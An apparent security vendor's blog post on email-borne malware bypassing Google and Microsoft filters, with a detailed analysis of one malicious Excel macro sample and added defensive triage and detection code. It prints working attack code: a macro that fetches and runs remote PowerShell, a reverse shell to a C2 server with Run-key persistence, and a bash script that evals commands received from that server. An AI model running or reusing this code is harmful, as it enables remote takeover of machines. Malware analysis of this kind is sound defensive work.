How effective is your email security stack against the constantly shifting threat landscape? To best answer this question, you must continuously measure and validate the efficacy of your defenses against the latest threats facing the users your organization defends.
InQuest came to fruition in 2013 as a network sensor platform built by SOC analysts at the Pentagon who were looking to close the end-user security gap left behind by other best-of-breed solutions. Our focus started on the threat sequence to prevent email and web-borne threats from reaching enterprise users, ultimately preventing attackers from gaining an inside foothold.
In 2021, as we looked to expand our purview to the cloud, we went back to our roots and asked ourselves, “Where’s the new gap?” Thus an experiment was born: The Trystero Project.
The process for this effort is simple and straightforward:
- We harvest real-world malware from the wild and loop it through the two most popular cloud email providers, Google and Microsoft. We do this with the various security levels each provider makes available by default, enabled or disabled in turn.
- We then monitor which of those samples makes it through the security gauntlets the providers have created.
- The samples that do make it into our instrumented mailboxes are then captured and analyzed, with results being stored and shared publicly with the world.
In April alone, we harvested 444 samples capable of bypassing either Microsoft or Google. Of those, Microsoft missed 182 (41%) and Google missed 212 (48%). These real-world samples require additional security measures to ensure they cannot reach your users’ inboxes.
Sample Highlight
Let’s take a look at an interesting sample that flowed through our Email Attack Simulator on May 25th: a Microsoft Office spreadsheet containing coercive instructions designed to entice the target user into enabling the embedded VBA macro. Sometimes these instructions are embedded within images; other times, as here, they are written out plainly:

Both InQuest heuristics and machine learning models detected this sample as malicious with high confidence:

So did a large number of AV vendors: 19 of them on the initial scan on May 25th and 33 on the second scan on May 26th.

It’s quite typical for sample detection to improve over time as there is heavy sharing among the community.

The intent of the VBA macro is rather blatant: a partially obfuscated call to a remote PowerShell script hosted on Microsoft-owned GitHub:
Sub Workbook_Open()
Set WshShell = CreateObject("WScript.Shell")
Dim x As String
x = "powershell.exe -WindowStyle hidden -noprofile (power''sh''ell.ex''e {$d = ((Invok''e-Web''Requ''est https://raw.githubusercontent.com/azdakc/gasd/main/jdsin.txt).Content); power''she''ll''.ex''e -execu''tionpol''icy bypa''ss -ec $d})"
Set WshShellExec = WshShell.Exec(x)
MsgBox("This File is not compatible with this computer architecture x64. Please contact the owner of this File")
End Sub
We can see this IOC is automatically extracted via InQuest Deep File Inspection (DFI), directly on the InQuest Labs site above:
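The same extraction can be reproduced by hand. The following is an added example (not InQuest’s DFI code) that normalises the macro’s command line by undoing the `''` splice trick, pulls out and defangs the URL, flags the behavioural switches, and decodes a value passed to `-ec` (`-EncodedCommand`, base64 over UTF-16LE). The command string is the one quoted from the macro above; the stage-2 content is a constructed placeholder, since jdsin.txt itself is not reproduced here.

```python
"""Triage helper for the macro's obfuscated PowerShell command line.

Added example, not InQuest's code. MACRO_COMMAND is copied from the macro
quoted above; STAGE2_B64 is a constructed stand-in for the real jdsin.txt.
"""
import base64
import re
from urllib.parse import urlsplit

# The obfuscated command line from the macro's Workbook_Open handler.
MACRO_COMMAND = (
    "powershell.exe -WindowStyle hidden -noprofile (power''sh''ell.ex''e {$d = "
    "((Invok''e-Web''Requ''est https://raw.githubusercontent.com/azdakc/gasd/main/jdsin.txt)"
    ".Content); power''she''ll''.ex''e -execu''tionpol''icy bypa''ss -ec $d})"
)

# Constructed stand-in for what Invoke-WebRequest would return: powershell.exe
# -EncodedCommand (-ec) expects base64 of UTF-16LE text.
STAGE2_B64 = base64.b64encode(
    "Write-Output 'constructed stage-2 placeholder'".encode("utf-16-le")
).decode("ascii")

URL_RE = re.compile(r"https?://[^\s'\"()<>{}]+")

# Behavioural indicators checked on the normalised command line (case-insensitive).
INDICATORS = {
    "download cradle": r"invoke-webrequest|\biwr\b|downloadstring|downloadfile",
    "hidden window": r"-windowstyle\s+hidden",
    "execution policy bypass": r"-executionpolicy\s+bypass",
    "encoded command": r"\s-(?:ec|enc|encodedcommand)\b",
}


def unsplice(command: str) -> str:
    """Undo the '' splice trick: PowerShell concatenates an empty single-quoted
    string with the adjacent bare word, so power''shell parses as powershell.
    A lone quote left afterwards means the command carries real string
    literals, where a blind strip would corrupt them, so that case is refused."""
    cleaned = command.replace("''", "")
    if "'" in cleaned:
        raise ValueError("real single-quoted literals present; deobfuscate manually")
    return cleaned


def defang(url: str) -> str:
    """Render a URL safe to paste into a report (hxxp scheme, [.] in the host)."""
    parts = urlsplit(url)
    scheme = parts.scheme.replace("http", "hxxp")
    netloc = parts.netloc.replace(".", "[.]")
    query = f"?{parts.query}" if parts.query else ""
    return f"{scheme}://{netloc}{parts.path}{query}"


def decode_encoded_command(b64: str) -> str:
    """Decode a value passed to powershell.exe -EncodedCommand."""
    return base64.b64decode(b64).decode("utf-16-le")


def triage(command: str) -> dict:
    """Normalise the command line, then collect URLs and behavioural indicators."""
    normalised = unsplice(command)
    urls = URL_RE.findall(normalised)
    flags = [name for name, pattern in INDICATORS.items()
             if re.search(pattern, normalised, re.IGNORECASE)]
    return {
        "normalised": normalised,
        "urls": urls,
        "defanged": [defang(u) for u in urls],
        "flags": flags,
    }


if __name__ == "__main__":
    report = triage(MACRO_COMMAND)
    print(report["normalised"])
    for ioc in report["defanged"]:
        print("IOC:", ioc)
    print("flags:", ", ".join(report["flags"]))
    print("stage 2 (constructed):", decode_encoded_command(STAGE2_B64))
```

The splice removal is deliberately conservative: it only applies when the command contains no genuine single-quoted literals, because `'it''s'` is a legitimate escaped quote and stripping it would change the meaning. Real samples mix several obfuscation layers, so treat the indicator list as a starting point rather than a complete rule set.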

The hosting GitHub account and repository were both created on May 22nd:

After decoding and deobfuscating jdsin.txt, we see the following two script bodies. The first establishes a TCP connection to the IP address 149.100.157[.]219 on port 4443. It reads commands sent over the network, executes them using Invoke-Expression (iex), and sends the output of each command back over the same connection. Finally, the TCP connection is closed. The process runs in a hidden window via -WindowStyle hidden.
Start-Process $PSHOME\powershell.exe -ArgumentList {
$tcpClient = New-Object System.Net.Sockets.TCPClient('', 4443)
$stream = $tcpClient.GetStream()
[byte[]]$bytes = 0..65535 | ForEach-Object { 0 }
while (($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {
$receivedData = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i)
$output = (iex $receivedData 2>&1 | Out-String)
$prompt = $output + 'PS ' + (pwd).Path + '> '
$encodedPrompt = ([text.encoding]::ASCII).GetBytes($prompt)
$stream.Write($encodedPrompt, 0, $encodedPrompt.Length)
} -WindowStyle hidden
To complete the task, the second script body retrieves a PowerShell script called hopper.ps1 from the designated URL (https://raw.githubusercontent.com/azdakc/gasd/main/hopper[.]ps1) and stores it as Sys.ps1 in the user’s local AppData directory. It then runs the downloaded script using powershell.exe with the -WindowStyle hidden -NoProfile -ExecutionPolicy Bypass -File parameters.
powershell.exe {
$path = 'C:\Users\' + $env:UserName + '\AppData\Local'
$name = "Sys.ps1"
$outputFile = $path + "\" + $name
Invoke-WebRequest "https://raw.githubusercontent.com/azdakc/gasd/main/hopper.ps1" -OutFile $outputFile
powershell.exe -WindowStyle hidden -NoProfile -ExecutionPolicy Bypass -File $outputFile
} -WindowStyle hidden
The second PowerShell script seen here is the third stage of the malware payload:

From there, the next stage is received via a raw socket read from the IP address 149.100.167[.]219 on port 4443.
Here is the decoded and deobfuscated script that was downloaded as hopper.ps1 but saved on the system as sys.ps1.
Start-Process $PSHOME\powershell.exe -ArgumentList {
$tcpClient = New-Object System.Net.Sockets.TCPClient('', 4443)
$stream = $tcpClient.GetStream()
[byte[]]$bytes = 0..65535|%{0}
while (($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {
$receivedData = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i)
$output = (iex $receivedData 2>&1 | Out-String)
$prompt = $output + 'PS ' + (pwd).Path + '> '
$encodedPrompt = ([text.encoding]::ASCII).GetBytes($prompt)
$stream.Write($encodedPrompt, 0, $encodedPrompt.Length)
} -WindowStyle hidden
powershell.exe {
$appDataFolder = 'C:\Users\' + $env:UserName + '\AppData\Local'
$command = 'powershell.exe -windowstyle hidden -noprofile -executionpolicy bypass -file ' + $appDataFolder + '\Sys.ps1'
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v SystemServices /t REG_SZ /d $command /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v SystemServices /t REG_SZ /d $command /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices" /v SystemServices /t REG_SZ /d $command /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" /v SystemServices /t REG_SZ /d $command /f
} -WindowStyle hidden
Achieving persistence is a critical objective for malware authors seeking to maintain their malicious activities on compromised systems. In this analysis, the PowerShell script establishes persistence by modifying specific registry keys. It adds values to keys such as “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run” and “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce” (and, as the script above shows, RunServices and RunServicesOnce). By writing the command “powershell.exe powershell.exe -windowstyle hidden -noprofile -executionpolicy bypass -file $sdfsf5465ewiuvxnsfk\Sys.ps1” to these registry keys, the malware ensures that the malicious script executes automatically at user login or when the corresponding system events occur. This persistence mechanism allowed the script to evade detection and maintain its presence on the compromised system, emphasizing the importance of robust security measures to detect and prevent such unauthorized modifications to the Windows Registry.
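Every stage of this chain leaves a host telemetry footprint: Excel spawning powershell.exe with hidden-window and bypass switches, powershell.exe opening an outbound connection on a non-web port, and reg.exe writing a Run-key value that launches a script from AppData. The following is an added example (not InQuest’s detection content) that runs four such checks over constructed Sysmon-style events (EventID 1 process creation, 3 network connection, 13 registry value set). Every log line is constructed for this example, and the 203.0.113.0/24 addresses are TEST-NET documentation addresses, not the sample’s C2.

```python
"""Detection logic for the macro -> PowerShell -> reverse shell -> Run-key chain.

Added example, not InQuest's code. SAMPLE_EVENTS is constructed to resemble
Sysmon output (JSON, one event per line); the addresses are TEST-NET placeholders.
"""
import json
import re

SAMPLE_EVENTS = r"""
{"EventID": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE", "CommandLine": "powershell.exe -WindowStyle hidden -noprofile (powershell.exe {$d = ((Invoke-WebRequest https://raw.githubusercontent.com/azdakc/gasd/main/jdsin.txt).Content); powershell.exe -executionpolicy bypass -ec $d})"}
{"EventID": 3, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "DestinationIp": "203.0.113.10", "DestinationPort": 4443}
{"EventID": 13, "Image": "C:\\Windows\\System32\\reg.exe", "TargetObject": "HKU\\S-1-5-21-1111111111-2222222222-3333333333-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\SystemServices", "Details": "powershell.exe -windowstyle hidden -noprofile -executionpolicy bypass -file C:\\Users\\alice\\AppData\\Local\\Sys.ps1"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell.exe -NoProfile -Command Get-Date"}
{"EventID": 3, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "DestinationIp": "203.0.113.20", "DestinationPort": 443}
""".strip().splitlines()

OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
# The four autostart keys the sample writes; matched on the Sysmon TargetObject path.
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\(?:Run|RunOnce|RunServices|RunServicesOnce)\\", re.I)
# PowerShell accepts abbreviated switches, so -w and -ep are matched alongside the long forms.
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
BYPASS_RE = re.compile(r"-e(?:xecutionpolicy|p)\s+bypass|\s-(?:ec|enc|encodedcommand)\b", re.I)
EXPECTED_PORTS = {80, 443}


def basename(path: str) -> str:
    """Lower-cased file name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def check_event(index: int, ev: dict) -> list:
    """Apply the chain's four rules to one parsed event; returns zero or more findings."""
    findings = []
    eid = ev.get("EventID")
    image = basename(ev.get("Image", ""))
    if eid == 1 and image == "powershell.exe":
        parent = basename(ev.get("ParentImage", ""))
        cmd = ev.get("CommandLine", "")
        if parent in OFFICE_PARENTS:
            findings.append({"index": index, "rule": "office-spawned-powershell", "evidence": parent})
        if HIDDEN_RE.search(cmd) and BYPASS_RE.search(cmd):
            findings.append({"index": index, "rule": "hidden-powershell-bypass", "evidence": cmd[:60]})
    elif eid == 3 and image == "powershell.exe":
        port = int(ev.get("DestinationPort", 0))
        if port not in EXPECTED_PORTS:
            findings.append({"index": index, "rule": "powershell-nonstandard-port-egress",
                             "evidence": f"{ev.get('DestinationIp')}:{port}"})
    elif eid == 13:
        target = ev.get("TargetObject", "")
        details = ev.get("Details", "")
        if RUN_KEY_RE.search(target) and "powershell" in details.lower():
            findings.append({"index": index, "rule": "run-key-persistence", "evidence": target})
    return findings


def scan(lines) -> list:
    """Parse each JSON event line and collect findings across the whole log."""
    findings = []
    for i, line in enumerate(lines):
        findings.extend(check_event(i, json.loads(line)))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"event {f['index']}: {f['rule']} ({f['evidence']})")
```

The two benign events (explorer.exe launching an interactive PowerShell, and powershell.exe talking to port 443) produce no findings, which is the point of keying the network rule on the process rather than on the port alone. In production the port and parent-process lists would come from an allow-list tuned to the environment, and the Run-key rule should also cover the HKLM equivalents.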
The final question concerns the commands sent by the remote server and the payload potentially delivered to our victim. To investigate the behavior here, the following script connects to that server and records the commands it sends.
log_file="command_log.txt"
# open a bidirectional TCP connection to the C2 on file descriptor 3
exec 3<>/dev/tcp/
while IFS= read -r -u 3 cmd; do
    # record each command the server sends before handling it
    echo "$cmd" >> "$log_file"
    result=$(eval "$cmd" 2>&1)
    # mimic the implant's reply: command output followed by a prompt
    prompt="$result"$(pwd)" > "
    echo -n "$prompt" >&3
done
exec 3>&-
echo "Command log saved to: $log_file"
After multiple iterations, the only commands received appeared to be enumeration type commands.
$ tail -f command_log.txt
echo "$(hostname)"
echo 0bf97027b0bb4e278dea970aa24d9570
At this point, we can only speculate that the attacker has the ability to specify a payload or specific actions for a host of particular interest. Perhaps a replacement with:
eval "$(echo 'dGVsbmV0IHRvd2VsLmJsaW5rZW5saWdodHMubmw=' | base64 -d)"
